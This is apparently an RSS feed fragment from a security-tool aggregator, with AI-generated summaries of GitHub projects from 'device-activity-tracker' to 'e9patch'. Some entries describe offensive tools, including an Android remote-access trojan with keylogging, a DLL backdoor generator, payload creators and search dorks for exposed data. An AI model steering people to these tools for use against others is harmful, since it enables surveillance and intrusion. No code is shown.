&lt;p&gt;&lt;a href="https://github.com/dethrace-labs/dethrace/actions/workflows/workflow.yml"&gt;&lt;img src="https://github.com/dethrace-labs/dethrace/actions/workflows/workflow.yaml/badge.svg" alt="Workflow"&gt;&lt;/a&gt;
&lt;a href="https://twitter.com/dethrace_labs"&gt;&lt;img src="https://badgen.net/badge/icon/twitter?icon=twitter&amp;amp;label" alt="Twitter"&gt;&lt;/a&gt;
&lt;a href="https://discord.gg/f5StsuP"&gt;&lt;img src="https://badgen.net/badge/icon/discord?icon=discord&amp;amp;label" alt="Discord Carmageddon server"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>device-activity-tracker</title><link>https://rainmana.github.io/hackyfeed/tools/gommzystudio-device-activity-tracker/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/gommzystudio-device-activity-tracker/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Device Activity Tracker is a proof-of-concept tool designed for the analysis of WhatsApp and Signal user activity through Round-Trip Time (RTT) measurement of message delivery receipts. Its primary use case is to uncover privacy vulnerabilities in these messaging apps by detecting user activity levels, device state, and potential location changes, all while presenting real-time data through an accessible web interface. Notable features include an easy setup via Docker, a client-server architecture, and a CLI option for direct tracking of WhatsApp users.&lt;/p&gt;</description></item><item><title>devops-tools</title><link>https://rainmana.github.io/hackyfeed/tools/techiescamp-devops-tools/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/techiescamp-devops-tools/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The &amp;ldquo;devops-tools&amp;rdquo; repository is a curated compilation of the most effective and popular DevOps tools for 2024, aimed at enhancing development and operational workflows. It categorizes tools into various segments such as Continuous Integration, Containerization, and Monitoring, providing brief descriptions to assist users in identifying the right tools for their needs. Notably, the repository encourages community contributions to continuously improve the list of resources available.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="curated-list-of-best-devops-tools-for-2024"&gt;Curated List of Best DevOps Tools for 2024&lt;/h1&gt;
&lt;p&gt;A curated collection of the most effective and popular DevOps tools to streamline your development and operations processes for 2024&lt;/p&gt;</description></item><item><title>dexcalibur</title><link>https://rainmana.github.io/hackyfeed/tools/frenchyeti-dexcalibur/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/frenchyeti-dexcalibur/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Dexcalibur is an advanced Android reverse engineering platform that focuses on automating dynamic instrumentation for improved analysis. Its notable features include the ability to decompile and disassemble intercepted bytecode at runtime, manage multiple hooks, and perform static analysis with its built-in engine capable of executing smali code. This tool is designed to streamline the tedious tasks associated with dynamic analysis, making it essential for security researchers and developers.&lt;/p&gt;</description></item><item><title>DGFraud</title><link>https://rainmana.github.io/hackyfeed/tools/safe-graph-dgfraud/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/safe-graph-dgfraud/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; DGFraud is a Graph Neural Network (GNN) toolbox designed for detecting fraud in various systems by integrating and comparing state-of-the-art GNN-based models. Its primary use case lies in enhancing the efficacy of fraud detection mechanisms through advanced graph-based methodologies. Notable features include a modular architecture for implementing new models, comprehensive documentation on existing algorithms, and support for TensorFlow 2.0, allowing seamless integration into existing projects.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p align="center"&gt;
 &lt;br&gt;
 &lt;a href="https://image.flaticon.com/icons/svg/1671/1671517.svg"&gt;
 &lt;img src="https://github.com/safe-graph/DGFraud/blob/master/DGFraud_logo.png" width="400"/&gt;
 &lt;/a&gt;
 &lt;br&gt;
&lt;p&gt;
&lt;p align="center"&gt;
 &lt;a href="https://travis-ci.org/github/safe-graph/DGFraud"&gt;
 &lt;img alt="PRs Welcome" src="https://travis-ci.org/safe-graph/DGFraud.svg?branch=master"&gt;
 &lt;/a&gt;
 &lt;a href="https://github.com/safe-graph/DGFraud/blob/master/LICENSE"&gt;
 &lt;img alt="GitHub" src="https://img.shields.io/github/license/safe-graph/DGFraud"&gt;
 &lt;/a&gt;
 &lt;a href="https://github.com/safe-graph/DGFraud/pulls"&gt;
 &lt;img alt="GitHub release" src="https://img.shields.io/github/v/release/safe-graph/DGFraud?include_prereleases"&gt;
 &lt;/a&gt;
 &lt;a href="https://github.com/safe-graph/DGFraud/archive/master.zip"&gt;
 &lt;img alt="PRs" src="https://img.shields.io/badge/PRs-welcome-brightgreen.svg"&gt;
 &lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Dictionary-Of-Pentesting</title><link>https://rainmana.github.io/hackyfeed/tools/insightglacier-dictionary-of-pentesting/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/insightglacier-dictionary-of-pentesting/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Dictionary-Of-Pentesting is a comprehensive collection of dictionaries designed for penetration testing, vulnerability discovery, brute force attacks, and fuzzing. It categorizes resources such as authentication, file paths, ports, domains, and various default credentials, and continuously expands its listings to include regex patterns, user credentials, and application-specific payloads. Notable features include a broad range of default password lists, HTTP parameter enumeration, and the inclusion of specific patterns for cloud services and common vulnerabilities.&lt;/p&gt;</description></item><item><title>Digital-Forensics-Guide</title><link>https://rainmana.github.io/hackyfeed/tools/mikeroyal-digital-forensics-guide/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/mikeroyal-digital-forensics-guide/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Digital Forensics Guide serves as a comprehensive resource for those engaged in digital forensics, providing a compilation of applications, libraries, and tools essential for effectively conducting forensic investigations. The guide includes sections on various forensic fields such as computer, mobile, and network forensics, along with curated lists of tutorials, certifications, and frameworks to enhance practitioners&amp;rsquo; skills and knowledge. Notable features include playbooks for practical application and a structured format for easy navigation through key topics.&lt;/p&gt;</description></item><item><title>diodb</title><link>https://rainmana.github.io/hackyfeed/tools/disclose-diodb/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/disclose-diodb/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Diodb is a community-driven, vendor-agnostic database designed to catalog Vulnerability Disclosure Programs (VDPs) and Bug Bounty Programs (BBPs), including essential details such as contact information, policy locations, and reward structures. It facilitates streamlined engagement between security researchers and organizations, promoting best practices like Safe Harbor for ethical hacking. Notable features include a searchable front-end interface, options to download raw data in JSON format, and tools for generating VDPs easily.&lt;/p&gt;</description></item><item><title>dirhunt</title><link>https://rainmana.github.io/hackyfeed/tools/nekmo-dirhunt/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/nekmo-dirhunt/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Dirhunt is a web crawling tool designed to search for and analyze directories on web servers, identifying interesting content even when directory listings are disabled. It efficiently detects false 404 errors and empty index files while minimizing server requests, supporting features such as multiple site processing, detection of redirectors, and integration with various data sources for enhanced directory discovery. The tool is aimed at audit teams and is intended for use on owned or authorized servers only.&lt;/p&gt;</description></item><item><title>dirmap</title><link>https://rainmana.github.io/hackyfeed/tools/h4ckforjob-dirmap/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/h4ckforjob-dirmap/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Dirmap is an advanced web directory scanning tool designed for comprehensive directory discovery and vulnerability assessment, surpassing the capabilities of tools like DirBuster and Dirsearch. Its notable features include support for concurrent scanning across multiple targets and payloads, recursive scanning with customizable status code triggers, dynamic dictionary creation through web crawling, and extensive configuration options for request handling and response processing. This makes Dirmap particularly effective for security professionals conducting thorough penetration testing and vulnerability assessments on web applications.&lt;/p&gt;</description></item><item><title>discover</title><link>https://rainmana.github.io/hackyfeed/tools/leebaird-discover/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/leebaird-discover/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Discover is a customizable suite of bash scripts designed to automate various tasks in penetration testing, including recon, scanning, enumeration, and malicious payload creation with Metasploit, ideal for use on Kali Linux or Ubuntu systems. Notable features include multiple reconnaissance options for domains and persons, automated scanning tools that utilize Nmap and other utilities, and web application testing facilities incorporating tools like Nikto and SSL analysers. The tool simplifies complex penetration testing workflows through an organized menu structure, enabling swift task execution.&lt;/p&gt;</description></item><item><title>DllShimmer</title><link>https://rainmana.github.io/hackyfeed/tools/print3m-dllshimmer/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/print3m-dllshimmer/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; DllShimmer is a tool designed to facilitate DLL hijacking by allowing users to backdoor any function in a DLL without disrupting the normal operation of the host program. It generates proxy DLLs through a boilerplate C++ file and a corresponding &lt;code&gt;.def&lt;/code&gt; file, ensuring that all exported functions maintain their original names and ordinal numbers, thus avoiding detection. Key features include support for both dynamic and static linking, the option to prevent multiple executions of the backdoor, and comprehensive debug logging capabilities.&lt;/p&gt;</description></item><item><title>dnsgen</title><link>https://rainmana.github.io/hackyfeed/tools/alephnullsk-dnsgen/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/alephnullsk-dnsgen/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; DNSGen 2.0 is an advanced DNS name permutation engine tailored for security researchers and penetration testers, facilitating subdomain discovery and security assessments through the generation of intelligent domain name variations. Notable features include a smart domain name permutation engine, support for custom wordlists, multiple sophisticated permutation techniques such as word affixing and cloud-specific patterns, and integration capabilities with tools like MassDNS for efficient domain resolution.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="dnsgen-20---advanced-dns-name-permutation-engine-"&gt;DNSGen 2.0 - Advanced DNS Name Permutation Engine 🚀&lt;/h1&gt;
&lt;p&gt;&lt;a href="https://opensource.org/licenses/MIT"&gt;&lt;img src="https://img.shields.io/badge/License-MIT-yellow.svg" alt="License: MIT"&gt;&lt;/a&gt;
&lt;a href="https://www.python.org/downloads/"&gt;&lt;img src="https://img.shields.io/badge/python-3.7+-blue.svg" alt="Python 3.9+"&gt;&lt;/a&gt;
&lt;a href="https://github.com/psf/black"&gt;&lt;img src="https://img.shields.io/badge/code%20style-black-000000.svg" alt="Code style: black"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>dnstwist</title><link>https://rainmana.github.io/hackyfeed/tools/elceef-dnstwist/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/elceef-dnstwist/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; dnstwist is a DNS-centric tool designed for domain name permutation and reconnaissance, allowing security researchers to discover potential phishing domains and domain variations. Its primary use case is to enhance domain security assessments by identifying lookalike domains and subdomain enumeration. Notable features include support for various DNS record lookups, historical data integration, and API access for automation.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p&gt;docs/README.md&lt;/p&gt;</description></item><item><title>dockle</title><link>https://rainmana.github.io/hackyfeed/tools/goodwithtech-dockle/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/goodwithtech-dockle/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Dockle is a container image linter designed to enhance the security and compliance of Docker images by identifying vulnerabilities and recommending adherence to best practices, including CIS Benchmarks. It offers a simple command-line interface for scanning images, supports integration with CI/CD pipelines, and provides detailed checkpoint reports regarding security issues and Dockerfile practices. Notable features include vulnerability detection and the ability to customize scan parameters for fine-tuning results.&lt;/p&gt;</description></item><item><title>DogeRat</title><link>https://rainmana.github.io/hackyfeed/tools/shivaya-dav-dogerat/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/shivaya-dav-dogerat/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; DogeRat is an advanced Android remote administration tool (RAT) that enables real-time control over Android devices through a Telegram-based interface without the need for port forwarding. Notable features include the ability to send and receive messages, capture multimedia, access location data, manage contacts, and utilize keylogger functionality, with additional capabilities available in its paid version, such as encryption and undetectable injections. The tool is intended solely for educational purposes and boasts a comprehensive set of functionalities for thorough device management.&lt;/p&gt;</description></item><item><title>domain-digger</title><link>https://rainmana.github.io/hackyfeed/tools/wotschofsky-domain-digger/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/wotschofsky-domain-digger/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Domain Digger is a comprehensive domain analysis toolkit designed to provide detailed insights into domain information through a user-friendly interface. Its primary use case includes performing DNS lookups, WHOIS inquiries, and IP geolocation, while notable features include intelligent search suggestions, a visual DNS map, and support for multiple DNS resolvers, enhancing both the depth and efficiency of domain investigations.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Do you enjoy using Domain Digger? Leave a star! 🌟&lt;/strong&gt;&lt;/p&gt;</description></item><item><title>domloggerpp</title><link>https://rainmana.github.io/hackyfeed/tools/kevin-mizu-domloggerpp/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/kevin-mizu-domloggerpp/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; DOMLoggerpp is a browser extension designed for monitoring, intercepting, and debugging JavaScript sinks through customizable configurations. It features regex-based domain management, flexible hooking options, on-demand debugging breakpoints, a dynamic notification system, and an integrated Devtools log panel for enhanced log management and filtering. This tool is especially useful for developers and security professionals looking to analyze and debug JavaScript execution flows within web applications.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p align="center"&gt;
 &lt;img src="./.github/banner.png" width="80%"&gt;&lt;br&gt;
 A browser extension that allows you to monitor, intercept, and debug JavaScript sinks based on customizable configurations.
 &lt;br&gt;
 &lt;img alt="GitHub release (latest by date)" src="https://img.shields.io/github/v/release/kevin-mizu/DOMLoggerpp"&gt;
 &lt;a href="https://twitter.com/intent/follow?screen_name=kevin_mizu" title="Follow"&gt;&lt;img src="https://img.shields.io/twitter/follow/podalirius_?label=kevin_mizu&amp;style=social"&gt;&lt;/a&gt;
 &lt;br&gt;
&lt;/p&gt;</description></item><item><title>Dorks-collections-list</title><link>https://rainmana.github.io/hackyfeed/tools/cipher387-dorks-collections-list/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/cipher387-dorks-collections-list/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Dorks-collections list is a comprehensive repository that aggregates various search engine dorks tailored for cybersecurity professionals, penetration testers, and researchers. It features organized links to dork lists across multiple platforms such as Google, Shodan, and GitHub, facilitating targeted searches for sensitive data and vulnerabilities. Notable features include specific sections for different types of dorks, including those for detecting sensitive files, SQL injection vulnerabilities, and administrative panels, alongside automation tools and browser extensions for streamlined usage.&lt;/p&gt;</description></item><item><title>dotenv</title><link>https://rainmana.github.io/hackyfeed/tools/motdotla-dotenv/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/motdotla-dotenv/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Dotenv is a lightweight Node.js module that simplifies the management of environment variables by loading them from a &lt;code&gt;.env&lt;/code&gt; file into &lt;code&gt;process.env&lt;/code&gt;. Its primary use case is to separate application configuration from code, following best practices as outlined in The Twelve-Factor App methodology. Notable features include support for multiline values, custom path configuration, and the ability to preload the module without explicit imports in application code.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="dotenv-npm-version-downloads"&gt;dotenv &lt;a href="https://www.npmjs.com/package/dotenv"&gt;&lt;img src="https://img.shields.io/npm/v/dotenv.svg?style=flat-square" alt="NPM version"&gt;&lt;/a&gt; &lt;a href="https://www.npmjs.com/package/dotenv"&gt;&lt;img src="https://img.shields.io/npm/dw/dotenv" alt="downloads"&gt;&lt;/a&gt;&lt;/h1&gt;
&lt;img src="https://raw.githubusercontent.com/motdotla/dotenv/master/dotenv.svg" alt="dotenv" align="right" width="200" /&gt;
&lt;p&gt;Dotenv is a zero-dependency module that loads environment variables from a &lt;code&gt;.env&lt;/code&gt; file into &lt;a href="https://nodejs.org/docs/latest/api/process.html#process_process_env"&gt;&lt;code&gt;process.env&lt;/code&gt;&lt;/a&gt;. Storing configuration in the environment separate from code is based on &lt;a href="https://12factor.net/config"&gt;The Twelve-Factor App&lt;/a&gt; methodology.&lt;/p&gt;</description></item><item><title>dotenvx</title><link>https://rainmana.github.io/hackyfeed/tools/dotenvx-dotenvx/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/dotenvx-dotenvx/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Dotenvx is a secure dotenv tool that allows developers to manage environment variables across multiple platforms and programming languages. Its primary use case is to enhance the safety and flexibility of environment variable handling by providing support for encrypted environment files and easy integration into existing applications. Notable features include cross-platform compatibility, multi-environment management, and straightforward installation options via various package managers and direct execution methods.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://dotenvx.com"&gt;&lt;img src="https://dotenvx.com/banner.png" alt="dotenvx"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>doublepulsar-detection-script</title><link>https://rainmana.github.io/hackyfeed/tools/withsecurelabs-doublepulsar-detection-script/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/withsecurelabs-doublepulsar-detection-script/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The DoublePulsar Detection Script is a Python tool designed to identify the presence of the DoublePulsar implant on systems through SMB and RDP protocols. It supports scanning single IPs or lists of IPs with multi-threading capabilities, and includes functionality for remote uninstall of the implant for remediation. Key features include detection capabilities for both protocols, an early release for urgent network compromise identification, and associated Snort signatures for enhanced detection.&lt;/p&gt;</description></item><item><title>dpt-shell</title><link>https://rainmana.github.io/hackyfeed/tools/luoyesiqiu-dpt-shell/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/luoyesiqiu-dpt-shell/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; dpt-shell is an Android Dex protection tool designed to hollow out method implementations within DEX files, facilitating runtime reconstruction for enhanced protection of Android applications. Primary use cases include securing APKs and AABs against reverse engineering, with notable features such as customizable protection configurations, exclusion of specific ABIs, and the ability to dump DEX code items for analysis.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="dpt-shell"&gt;dpt-shell&lt;/h1&gt;
&lt;p&gt;&lt;a href="https://github.com/luoyesiqiu/dpt-shell/blob/main/LICENSE"&gt;&lt;img src="https://img.shields.io/github/license/luoyesiqiu/dpt-shell" alt=""&gt;&lt;/a&gt; &lt;a href="https://github.com/luoyesiqiu/dpt-shell/releases/latest"&gt;&lt;img src="https://img.shields.io/github/downloads/luoyesiqiu/dpt-shell/total?color=blue" alt=""&gt;&lt;/a&gt; &lt;a href="https://github.com/luoyesiqiu/dpt-shell/issues"&gt;&lt;img src="https://img.shields.io/github/issues-raw/luoyesiqiu/dpt-shell?color=red" alt=""&gt;&lt;/a&gt; &lt;img src="https://img.shields.io/badge/Android-5.0%2B-brightgreen" alt=""&gt;&lt;/p&gt;
&lt;p&gt;English | &lt;a href="./README.zh-CN.md"&gt;简体中文&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;dpt-shell is an Android Dex protection shell that hollows out Dex method implementations and reconstructs them at runtime.&lt;/p&gt;</description></item><item><title>dradis-ce</title><link>https://rainmana.github.io/hackyfeed/tools/dradis-dradis-ce/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/dradis-dradis-ce/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Dradis is an open-source collaboration framework designed for automated penetration testing report generation, enabling InfoSec teams to streamline reporting processes by importing data from various security tools like Burp Suite and Nessus. Its notable features include platform independence, markup support for notes, and a powerful extensions interface that enhances flexibility and usability. Dradis aims to generate consistent and professional pentest reports while minimizing manual efforts, thereby allowing teams to focus on analysis and recommendations.&lt;/p&gt;</description></item><item><title>drakvuf</title><link>https://rainmana.github.io/hackyfeed/tools/tklengyel-drakvuf/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/tklengyel-drakvuf/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; DRAKVUF is an agentless, virtualization-based binary analysis tool designed for in-depth execution tracing of arbitrary binaries, including operating systems. Its primary use case is malware analysis, leveraging minimal footprint to remain stealthy during the examination process while supporting a range of Windows and Linux environments. Notable features include the ability to operate without installing additional software in the virtual machine and compatibility with hardware virtualization extensions in Intel CPUs.&lt;/p&gt;</description></item><item><title>droidReverse</title><link>https://rainmana.github.io/hackyfeed/tools/juude-droidreverse/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/juude-droidreverse/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; droidReverse is a comprehensive toolkit for Android reverse engineering, integrating multiple tools for decompiling APK files and analyzing bytecode. Its primary use case is facilitating the examination and modification of Android applications by converting APKs to readable formats and supporting various analysis capabilities, including malware detection. Notable features include support for multiple decompilation techniques, a graphical user interface for various tools, and capabilities for dynamic editing and package management.&lt;/p&gt;</description></item><item><title>dronesploit</title><link>https://rainmana.github.io/hackyfeed/tools/dronesploit-dronesploit/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/dronesploit-dronesploit/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; DroneSploit is a command-line interface framework designed for penetration testing of light commercial drones, leveraging techniques and exploits similar to Metasploit. It allows users to interactively conduct security assessments on drone systems, with features that include a variety of modules for specific drone payload alterations such as changing passwords or SSIDs. The framework&amp;rsquo;s structure facilitates easy extension and integration of new hacking techniques.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p align="center"&gt;&lt;img src="https://github.com/dhondta/dronesploit/raw/main/docs/pages/img/logo.png"&gt;&lt;/p&gt;
&lt;h1 align="center"&gt;DroneSploit &lt;a href="https://twitter.com/intent/tweet?text=DroneSploit%20-%20Console%20made%20with%20SploitKit%20for%20hacking%20light%20commercial%20drones.%0D%0Ahttps%3a%2f%2fgithub%2ecom%2fdhondta%2fdronesploit%0D%0A&amp;hashtags=python,console,sploitkit,dronehacking,dronepentesting"&gt;&lt;img src="https://img.shields.io/badge/Tweet--lightgrey?logo=twitter&amp;style=social" alt="Tweet" height="20"/&gt;&lt;/a&gt;&lt;/h1&gt;
&lt;h3 align="center"&gt;Easily pentest drones.&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://pypi.python.org/pypi/dronesploit/"&gt;&lt;img src="https://img.shields.io/pypi/v/dronesploit.svg" alt="PyPi"&gt;&lt;/a&gt;
&lt;a href="https://dronesploit.readthedocs.io/en/latest/?badge=latest"&gt;&lt;img src="https://readthedocs.org/projects/dronesploit/badge/?version=latest" alt="Read The Docs"&gt;&lt;/a&gt;
&lt;a href="https://pypi.python.org/pypi/dronesploit/"&gt;&lt;img src="https://img.shields.io/pypi/pyversions/dronesploit.svg" alt="Python Versions"&gt;&lt;/a&gt;
&lt;a href="https://snyk.io/test/github/dhondta/dronesploit?targetFile=requirements.txt"&gt;&lt;img src="https://snyk.io/test/github/dhondta/dronesploit/badge.svg?targetFile=requirements.txt" alt="Known Vulnerabilities"&gt;&lt;/a&gt;
&lt;a href="https://zenodo.org/badge/latestdoi/207086727"&gt;&lt;img src="https://zenodo.org/badge/207086727.svg" alt="DOI"&gt;&lt;/a&gt;
&lt;a href="https://www.blackhat.com/eu-19/arsenal/schedule/index.html#drone-hacking-with-dronesploit-18217"&gt;&lt;img src="https://raw.githubusercontent.com/toolswatch/badges/master/arsenal/europe/2019.svg?sanitize=true" alt="Black Hat Arsenal Europe 2019"&gt;&lt;/a&gt;
&lt;a href="https://github.com/dhondta/dronesploit/blob/main/LICENSE"&gt;&lt;img src="https://img.shields.io/badge/license-AGPL%20v3-lightgrey.svg" alt="License"&gt;&lt;/a&gt;
&lt;a href="https://dronesploit.readthedocs.io/en/latest/newmodules.html#new-modules"&gt;&lt;img src="https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat" alt="Contribution"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>DumpsterFire</title><link>https://rainmana.github.io/hackyfeed/tools/trycatchhcf-dumpsterfire/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/trycatchhcf-dumpsterfire/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The DumpsterFire Toolset is a cross-platform, modular tool designed for creating automated, time-delayed security events suitable for both Red and Blue Team exercises. Its primary use case is to facilitate realistic cyber incident simulations and training by allowing users to build customizable event chains that can generate network and filesystem artifacts, enhancing incident response capabilities. Notable features include dynamic extensibility for adding custom event modules, a menu-driven interface for ease of use, and the ability to run exercises in a controlled manner without direct supervision.&lt;/p&gt;</description></item><item><title>dumpulator</title><link>https://rainmana.github.io/hackyfeed/tools/mrexodia-dumpulator/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/mrexodia-dumpulator/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Dumpulator is a dynamic code emulation library designed for analyzing minidump files, facilitating the reverse engineering of malware and other binaries. Its primary use case includes emulating function calls and tracing execution paths within dumped memory structures, allowing users to decrypt strings and execute code snippets easily. Notable features comprise memory allocation, UTF-16 string reading, and the ability to trace execution for debugging purposes, all while presenting a clean interface for integration within Python scripts.&lt;/p&gt;</description></item><item><title>Dwarf</title><link>https://rainmana.github.io/hackyfeed/tools/igio90-dwarf/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/igio90-dwarf/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Dwarf is a versatile debugger designed for reverse engineers, crackers, and security analysts, facilitating the analysis of applications on various platforms, including Android, iOS, and local environments. Leveraging PyQt5 and Frida, it offers features such as a debugging UI, session management with agent integration, and the ability to trace Java and native functions, enabling users to conduct detailed investigations into application behavior. Additionally, Dwarf supports scripting with a dedicated API that enhances productivity through autocompletion and inline documentation.&lt;/p&gt;</description></item><item><title>e9patch</title><link>https://rainmana.github.io/hackyfeed/tools/gjduck-e9patch/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/gjduck-e9patch/</guid><description>&lt;blockquote&gt;
